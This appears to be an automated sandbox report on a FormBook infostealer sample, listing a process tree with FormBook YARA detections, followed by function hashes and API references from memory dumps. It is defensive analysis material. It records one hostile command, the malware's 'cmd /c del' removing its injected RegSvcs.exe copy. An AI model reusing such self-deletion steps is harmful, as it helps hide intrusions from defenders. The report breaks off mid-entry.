Start date:	08/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegSvcs.exe PID: 6228 Parent PID: 3092

General

Start time:	13:12:17
Start date:	08/04/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0x4c0000
File size:	45152 bytes
MD5 hash:	2867A3817C9245F7CF518524DFD18F28
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.306525774.0000000000A40000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.306525774.0000000000A40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.306525774.0000000000A40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 3472 Parent PID: 6228

General

Start time:	13:12:20
Start date:	08/04/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6904 Parent PID: 3472

General

Start time:	13:12:35
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe
Imagebase:	0x13d0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.504075659.0000000004D70000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.504075659.0000000004D70000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.504075659.0000000004D70000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.503984351.0000000004D40000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.503984351.0000000004D40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.503984351.0000000004D40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 7068 Parent PID: 6904

General

Start time:	13:12:42
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
Imagebase:	0x920000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 7080 Parent PID: 7068

General

Start time:	13:12:43
Start date:	08/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: gzU8odwaPalRTGB.exe PID: 3092 Parent PID: 5684 gzU8odwaPalRTGB.exeCOMMON

Executed Functions

Function 07D5C4B8, Relevance: 3.9, Strings: 3, Instructions: 153COMMON

Download Yara Rule

Strings

8-9v, xrefs: 07D5C5E4
8-9v, xrefs: 07D5C522
:H}I, xrefs: 07D5C615

Memory Dump Source

Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false

Similarity

API ID:
String ID: 8-9v$8-9v$:H}I
API String ID: 0-856856487
Opcode ID: 58ff3f9d40e0efcd13582263f9dc2ded70247340713989eecc4399faaa0d8c55
Instruction ID: a0e43a7e9fced0dcb1da1d1685eb2d64034928576c36043ba989a4584cde785e
Opcode Fuzzy Hash: 58ff3f9d40e0efcd13582263f9dc2ded70247340713989eecc4399faaa0d8c55
Instruction Fuzzy Hash: EA512A71E252199BCF08CFA5D9445EEFBB2EF8E310F14A525D80AF7254D7349902CB68

Uniqueness

Uniqueness Score: -1.00%

Function 08FDDF50, Relevance: 3.9, Strings: 3, Instructions: 145COMMON

Download Yara Rule

Strings

}tQ, xrefs: 08FDE035
|;-,, xrefs: 08FDE098
}tQ, xrefs: 08FDE02E

Memory Dump Source

Source File: 00000000.00000002.272442561.0000000008FD0000.00000040.00000001.sdmp, Offset: 08FD0000, based on PE: false

Similarity

API ID:
String ID: |;-,$}tQ$}tQ
API String ID: 0-2222723744
Opcode ID: 621f587b14c26ae09de46f006876325d0411286c7359ec46eea1a2effdd63150
Instruction ID: 53af082c04a46f8d91b7e2e556871d14a1f0c04f1aa19b36ce03f17fd4b62dbb
Opcode Fuzzy Hash: 621f587b14c26ae09de46f006876325d0411286c7359ec46eea1a2effdd63150
Instruction Fuzzy Hash: 91512975E0420A8FDB08CFAAC5416AEFBF2EF89301F18D46AD519A7254D7349A42CF94

Uniqueness

Uniqueness Score: -1.00%

Function 07D5F998, Relevance: 2.8, Strings: 2, Instructions: 268COMMON

Download Yara Rule

Strings

2W%, xrefs: 07D5FA0A
Daz, xrefs: 07D5FCAE

Memory Dump Source

Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false

Similarity

API ID:
String ID: 2W%$Daz
API String ID: 0-961997077
Opcode ID: 3fd7a4210253f8891da358d6d09bda66c2c658ac7cea271d63b797eb311c6e15
Instruction ID: 496443ee07c9eb6f4911dfa2189a304d35e720bb0f32267c251fee558acc3c5a
Opcode Fuzzy Hash: 3fd7a4210253f8891da358d6d09bda66c2c658ac7cea271d63b797eb311c6e15
Instruction Fuzzy Hash: 79B14AB0E19308DFCF08CFA5D58469EFBF6FB8A310F24A52AD845AB254D7349942CB15

Uniqueness

Uniqueness Score: -1.00%

Function 07D55430, Relevance: 2.7, Strings: 2, Instructions: 168COMMON

Download Yara Rule

Strings

_t'~, xrefs: 07D55631
_t'~, xrefs: 07D5562A

Memory Dump Source

Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false

Similarity

API ID:
String ID: _t'~$_t'~
API String ID: 0-3244676642
Opcode ID: 0817fd72f47aaf2b9c893e5a7a303601c03847a6b73986cdb1d0af4419a41853
Instruction ID: f74f47e1a028abfdfb79561fdab199dc53c3a0baa3a1b59f66d2f5a67db6587e
Opcode Fuzzy Hash: 0817fd72f47aaf2b9c893e5a7a303601c03847a6b73986cdb1d0af4419a41853
Instruction Fuzzy Hash: 6971F6B4D11209DFCF04DFA5E5886ADFBB2FB89305F20952AD816AB344DB385942CF91

Uniqueness

Uniqueness Score: -1.00%

Function 07D55420, Relevance: 2.7, Strings: 2, Instructions: 165COMMON

Download Yara Rule

Strings

_t'~, xrefs: 07D55631
_t'~, xrefs: 07D5562A

Memory Dump Source

Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false

Similarity

API ID:
String ID: _t'~$_t'~
API String ID: 0-3244676642
Opcode ID: c04e1209156dcf53b048bd9cc8190cae95b9cc7ac9ea95d185e6f772ba5d7ccb
Instruction ID: bdae3d4c843f907e252fd5a37e45b21c5f931d90243eb86600c181736f4f884c
Opcode Fuzzy Hash: c04e1209156dcf53b048bd9cc8190cae95b9cc7ac9ea95d185e6f772ba5d7ccb
Instruction Fuzzy Hash: D97113B4D10209DFCB04CFA5E5896ADFBB2BB89301F20956AD816A7384DB385942CF91

Uniqueness

Uniqueness Score: -1.00%

Function 07D56E51, Relevance: 1.6, APIs: 1, Instructions: 56nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 07D56ED7

Memory Dump Source

Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 99240be1fd4e4f5a0db36f0093e6928a2b314005c1e3dfc2bf3252b4808650f8
Instruction ID: db43dcf67bd0f097b730fcb5af2bf31e47f08a3fae797b712f6d98ec7bbe7c47
Opcode Fuzzy Hash: 99240be1fd4e4f5a0db36f0093e6928a2b314005c1e3dfc2bf3252b4808650f8
Instruction Fuzzy Hash: 4C21DBB59002599FCF10CF9AD884BDEFBF4BB48314F14852AE918A7200C375A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07D56E58, Relevance: 1.6, APIs: 1, Instructions: 55nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 07D56ED7

Memory Dump Source

Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: a06f1864a76e2b9152ec0393e3a6c44f968af035ae531065c53ff6a53baa2509
Instruction ID: 69a218efc9ac9e27c7587f3d53e45d638b5e4401564b0aa97630a9df3dbebbd0
Opcode Fuzzy Hash: a06f1864a76e2b9152ec0393e3a6c44f968af035ae531065c53ff6a53baa2509
Instruction Fuzzy Hash: 1C21EAB5900259AFCF10CF9AD884BDEFBF4FB48324F10842AE918A7200C375A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07D5CC08, Relevance: 1.5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

Strings

!eT+, xrefs: 07D5CE58

Memory Dump Source

Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false

Similarity

API ID:
String ID: !eT+
API String ID: 0-96305052
Opcode ID: 5e7981087180c58e194dc35b6dd8689b592ea273c39148358e9321ca3e1b91ff
Instruction ID: c4848826633bd7ebe013598d2e8002377607d4a2ecb2f6fe086fc1ecb1e05511
Opcode Fuzzy Hash: 5e7981087180c58e194dc35b6dd8689b592ea273c39148358e9321ca3e1b91ff
Instruction Fuzzy Hash: 76C11674E11209DFDB04CFA4D945BADFBB2BB89300F20A569D809BB384D735A942CF64

Uniqueness

Uniqueness Score: -1.00%

Function 07D5C180, Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

~MJ, xrefs: 07D5C299

Memory Dump Source

Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false

Similarity

API ID:
String ID: ~MJ
API String ID: 0-3276334052
Opcode ID: 6f413b7ece45a3dad1f4fb4ab82fbeb9bfce5914de53150385e5231e5c33f1d7
Instruction ID: a93ed6e0d2e076cdbb41c19f0a7c95bce76e01e11a10b855f0285e3fd5eea397
Opcode Fuzzy Hash: 6f413b7ece45a3dad1f4fb4ab82fbeb9bfce5914de53150385e5231e5c33f1d7
Instruction Fuzzy Hash: 70313070E292199FCF48CFE5D8455DDFBB6AB8E310F14A52AC409B7254D738D8018B64

Uniqueness

Uniqueness Score: -1.00%

Function 08FD5170, Relevance: .9, Instructions: 911COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.272442561.0000000008FD0000.00000040.00000001.sdmp, Offset: 08FD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c0239cd916c9e49b3b4d6b5fdc2bff61af7639cd40b54db2f29eca95d00326c
Instruction ID: b6eb878d22deb00097715374034bcc214cad9614a45f68ea6ef8cf72631ad7a6
Opcode Fuzzy Hash: 9c0239cd916c9e49b3b4d6b5fdc2bff61af7639cd40b54db2f29eca95d00326c
Instruction Fuzzy Hash: 86725B71A002199FCB14DFB9C884AAEBBB3FF89305F198169E915EB251DB30DD42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 08FD88A0, Relevance: .8, Instructions: 783COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.272442561.0000000008FD0000.00000040.00000001.sdmp, Offset: 08FD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e90777e2952a3c8cd19910e1b37e0c107f67691bc1a2f542facd4089b3af787
Instruction ID: e441055ebb605ebc8ac0648fabb241f581518daabe9dd4c71dfc858b00ccd12a
Opcode Fuzzy Hash: 9e90777e2952a3c8cd19910e1b37e0c107f67691bc1a2f542facd4089b3af787
Instruction Fuzzy Hash: B5728371A00309DFCB15CFA4C884AAEBBF2FF88346F198969E505AB351D770E941CB61

Uniqueness

Uniqueness Score: -1.00%

Function 08FDF8E8, Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.272442561.0000000008FD0000.00000040.00000001.sdmp, Offset: 08FD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92133fec8fa783d12a1a6f5d6e71e41c929fc81c9bfb3213581f342fcbfd2a33
Instruction ID: 3eb83eb9103fbbe4f108fbb6d867f947f89f876fd83606a7967b7983c0c3cc07
Opcode Fuzzy Hash: 92133fec8fa783d12a1a6f5d6e71e41c929fc81c9bfb3213581f342fcbfd2a33
Instruction Fuzzy Hash: CCD13A71D0530ADFCB04CFAAC8818AEFBB2FF89301B18C559D506AB254D734AA42CF95

Uniqueness

Uniqueness Score: -1.00%

Function 08FDF8D8, Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.272442561.0000000008FD0000.00000040.00000001.sdmp, Offset: 08FD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9aa3b3d770f5f4a0be3e653123bfe892a8a4ae19406b9c49730229b76af8bb7
Instruction ID: a1a9ae45b4df5a4526a998a7bcd7a9b6841500672f1f305c34262de4f3fc90c6
Opcode Fuzzy Hash: a9aa3b3d770f5f4a0be3e653123bfe892a8a4ae19406b9c49730229b76af8bb7
Instruction Fuzzy Hash: FDD13B75D0530ADFCB04CFA9C8818AEFBB2FF89301B18C559C516AB254D734AA42CF95

Uniqueness

Uniqueness Score: -1.00%

Function 07D5D2C8, Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86d34383932d742f5d6e14eadce77a6eea795d34b4afe218b9fbc063ba1a90a5
Instruction ID: ff5e50f8763567c9411823e4aa5f74f78e642c52fcf34fe968891cb72b11e34e
Opcode Fuzzy Hash: 86d34383932d742f5d6e14eadce77a6eea795d34b4afe218b9fbc063ba1a90a5
Instruction Fuzzy Hash: D591C5B4E042199FDF04DFA5D9455AEFBB2FF89300F109929D816A7254DB349942CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 08FDD7C0, Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.272442561.0000000008FD0000.00000040.00000001.sdmp, Offset: 08FD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3809d4bdcc416fb7ff54795069f8cf019b2b7b3fba642c14f6beadf73cc526de
Instruction ID: f2415ad75b4b57ee1e9d32e8242750f2d838f39525594a491057a6b3aab3148b
Opcode Fuzzy Hash: 3809d4bdcc416fb7ff54795069f8cf019b2b7b3fba642c14f6beadf73cc526de
Instruction Fuzzy Hash: A181E175E003098FCB08CFEAC8849DEFBB2EF89300F24952AD51AAB254D7349946CF54

Uniqueness

Uniqueness Score: -1.00%

Function 08FDAEA0, Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.272442561.0000000008FD0000.00000040.00000001.sdmp, Offset: 08FD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fe2f9fe05f2dc565d360ebf8ca7ba53eb750fc5c2f5e25155d568d03ed44ff3
Instruction ID: ecfb0ee2388c76519044c1e4e81239c8b351084842cc51c02f158a538c9558b6
Opcode Fuzzy Hash: 3fe2f9fe05f2dc565d360ebf8ca7ba53eb750fc5c2f5e25155d568d03ed44ff3
Instruction Fuzzy Hash: 577127B0E052598FCB04DFF9C585A9EFBF3AF88315F19C169D614A7345EB3099428B90

Uniqueness

Uniqueness Score: -1.00%

Function 08FDAC50, Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.272442561.0000000008FD0000.00000040.00000001.sdmp, Offset: 08FD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fa15deb1fbda5325e58140326d0c571d67adefbe95bda6a3fa9dbedb08394f2
Instruction ID: be51ba6a8e57f83ebb3d65e903eaf0a943c8aad18b8fa45b1237d13771704808
Opcode Fuzzy Hash: 1fa15deb1fbda5325e58140326d0c571d67adefbe95bda6a3fa9dbedb08394f2
Instruction Fuzzy Hash: 3F61C271E0021D8BDF05DFFAC840ADEBBB3AF98315F28C129DA14AB255EB315942CB54

Uniqueness

Uniqueness Score: -1.00%

Function 08FD32E0, Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.272442561.0000000008FD0000.00000040.00000001.sdmp, Offset: 08FD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac0b0c35d344aab42d941ac8973a2a42e59b4c9464781f90b334f6fcc56c2089
Instruction ID: ab2ab91dec7ed17301e5bbe8ebd0041f077a8d346c1d91de820406efe3d1a64b
Opcode Fuzzy Hash: ac0b0c35d344aab42d941ac8973a2a42e59b4c9464781f90b334f6fcc56c2089
Instruction Fuzzy Hash: 8471AE75E002088FDB14CFA9C984A9DFBB2FF89315F158029EA09AB355EB349842CF51

Uniqueness

Uniqueness Score: -1.00%

Function 08FD1540, Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.272442561.0000000008FD0000.00000040.00000001.sdmp, Offset: 08FD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc805657e586edc9948f24d9207fb6588f468e71a86af7c0a8140d052f50a844
Instruction ID: d0f187f10f5030698e346cade0a12581fa4396f34a11be4a8cd5a0322b493d67
Opcode Fuzzy Hash: fc805657e586edc9948f24d9207fb6588f468e71a86af7c0a8140d052f50a844
Instruction Fuzzy Hash: A661E175D0021DCBCB15DFA9C940ADEFBB2BF89301F1485A9D608BB215EB315A86CF90

Uniqueness

Uniqueness Score: -1.00%

Function 08FDE2A3, Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.272442561.0000000008FD0000.00000040.00000001.sdmp, Offset: 08FD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce586cd9cbc42d9be2d9a7df7cc97b4be8994bb48a46c2c3caf3561f97b053cf
Instruction ID: 315854d7cb822181a18057b5860e7af99def66031429a865c94e4c28a6831e05
Opcode Fuzzy Hash: ce586cd9cbc42d9be2d9a7df7cc97b4be8994bb48a46c2c3caf3561f97b053cf
Instruction Fuzzy Hash: 24510975E0520ADFCB44CFA9C9819AEFBF2FB88301F1485AAD518EB354D7349A418F91

Uniqueness

Uniqueness Score: -1.00%

Function 08FDCC43, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.272442561.0000000008FD0000.00000040.00000001.sdmp, Offset: 08FD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3cac7257c8122e17d92668ec00de27d02a98b1fedbe62c290ac8bda28fe6181
Instruction ID: 00a9d7bab9c3056f6cb2fb167e1d7e8b849717f930bb9c6adb297c0b5233afa7
Opcode Fuzzy Hash: d3cac7257c8122e17d92668ec00de27d02a98b1fedbe62c290ac8bda28fe6181
Instruction Fuzzy Hash: E9411A71E056188FEB58CFAAC850B9EBBB3FFC9200F04C5AAC908AB254DB304945CF51

Uniqueness

Uniqueness Score: -1.00%

Function 08FDE8FB, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.272442561.0000000008FD0000.00000040.00000001.sdmp, Offset: 08FD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edc64cf47768fa27f84919542ee3149b71b3dad87b37cbbf916bab044a055de4
Instruction ID: 5d96b1860cb84142cf070d412398269999c3f32f334cac530b5aab09a6ffb2ca
Opcode Fuzzy Hash: edc64cf47768fa27f84919542ee3149b71b3dad87b37cbbf916bab044a055de4
Instruction Fuzzy Hash: B62119B5E056588BDB18CFAAD8406DEFBB3AFC9310F18C16AD509AA258DB340946CF51

Uniqueness

Uniqueness Score: -1.00%

Function 07D51FE8, Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 816b7bd92805abe56ceac03ae9e6fda16e9ae6464bc37b9c5de6c773c24b0a94
Instruction ID: e3718adf1e84666a2c453b9f66ce795bfc9bb9901fbb65157894cdf360f98078
Opcode Fuzzy Hash: 816b7bd92805abe56ceac03ae9e6fda16e9ae6464bc37b9c5de6c773c24b0a94
Instruction Fuzzy Hash: CF21A8B1E056198BEB58CF6BDC4069EFBF7BBC8200F04C57AD908A7254EB3419468F51

Uniqueness

Uniqueness Score: -1.00%

Function 01676B80, Relevance: 6.1, APIs: 4, Instructions: 125threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 01676BF0
GetCurrentThread.KERNEL32 ref: 01676C2D
GetCurrentProcess.KERNEL32 ref: 01676C6A
GetCurrentThreadId.KERNEL32 ref: 01676CC3

Memory Dump Source

Source File: 00000000.00000002.260992257.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: dd1d1987a8c8c09a2e3dc62275309d6de8106a669d9cfd254aae9c8358f7e9d4
Instruction ID: d9a77c5e630e200dab41c4e84d6b079cb2b5be2e0be65202da6847a5a0c325d6
Opcode Fuzzy Hash: dd1d1987a8c8c09a2e3dc62275309d6de8106a669d9cfd254aae9c8358f7e9d4
Instruction Fuzzy Hash: 6C5163B0D006498FEB14CFA9DA48B9EBBF0FF88304F24845DE419A7350D774A844CB65

Uniqueness

Uniqueness Score: -1.00%

Function 01676B90, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 01676BF0
GetCurrentThread.KERNEL32 ref: 01676C2D
GetCurrentProcess.KERNEL32 ref: 01676C6A
GetCurrentThreadId.KERNEL32 ref: 01676CC3

Memory Dump Source

Source File: 00000000.00000002.260992257.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: bc6e46074bba65f1d233b196f25088d47710883d27bf6fe98cb3c1b39f07d07f
Instruction ID: 650d191039d72783910c46bdb99700e45f1ffde0363a6fb2b17936758505a98d
Opcode Fuzzy Hash: bc6e46074bba65f1d233b196f25088d47710883d27bf6fe98cb3c1b39f07d07f
Instruction Fuzzy Hash: D35142B0D006498FEB14CFAADA48B9EBBF0FB88314F24855DE519A7350D774A844CF65

Uniqueness

Uniqueness Score: -1.00%

Function 07D5AFE0, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07D5B216

Memory Dump Source

Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c8bea843466aeb8e1ce1da9bf56b54d2c0e2845a1d01ae5409f91468141ab855
Instruction ID: 19173c15d47997a3c418e4e7f0a0532dbc63bcbc7a9af0b85583947cad4684a5
Opcode Fuzzy Hash: c8bea843466aeb8e1ce1da9bf56b54d2c0e2845a1d01ae5409f91468141ab855
Instruction Fuzzy Hash: 1A9159B1D00219CFDF10CFA8C885BEEBBB2BF49314F05856AD858A7280DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0167BBB8, Relevance: 1.7, APIs: 1, Instructions: 202COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0167BE0E

Memory Dump Source

Source File: 00000000.00000002.260992257.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 0cf5aa719d2dae267d243dc2141879d86d7a7128c64e55342922d7374e193aca
Instruction ID: f3effc79cccf54c93f30bb858c51100b5ac999f7fef356399277d9266b19463e
Opcode Fuzzy Hash: 0cf5aa719d2dae267d243dc2141879d86d7a7128c64e55342922d7374e193aca
Instruction Fuzzy Hash: BA711270A00B068FD764DF2AC94579ABBF1FF88204F108A2DD596D7B40DB75E8458F91

Uniqueness

Uniqueness Score: -1.00%

Function 0167DC6D, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0167DD8A

Memory Dump Source

Source File: 00000000.00000002.260992257.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 2a951e182512f8c1f4ad50dc896cad22b4a56eb63b014e3adf98944993e60496
Instruction ID: e36ef991ce4eda8f0d9c976d2c0f9d25d7ea1979b7253dd275a0dce522953b35
Opcode Fuzzy Hash: 2a951e182512f8c1f4ad50dc896cad22b4a56eb63b014e3adf98944993e60496
Instruction Fuzzy Hash: C151CFB1D003199FDF14CFDAC884ADEBBB5BF88314F24852AE819AB250D7B49945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0167DC78, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0167DD8A

Memory Dump Source

Source File: 00000000.00000002.260992257.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 3c7ae5a3ca0d6b429898a303fff9e3398adee1d2ac315f3070251040f4b1e899
Instruction ID: f165497a8d7f22dabfa30ec45216ca3fab54bb709f45435f9b618e87a273d5b1
Opcode Fuzzy Hash: 3c7ae5a3ca0d6b429898a303fff9e3398adee1d2ac315f3070251040f4b1e899
Instruction Fuzzy Hash: E441BDB1D003599FDF14CFDAC884ADEBBB5BF88314F24862AE819AB250D7749945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01676D41, Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01676E3F

Memory Dump Source

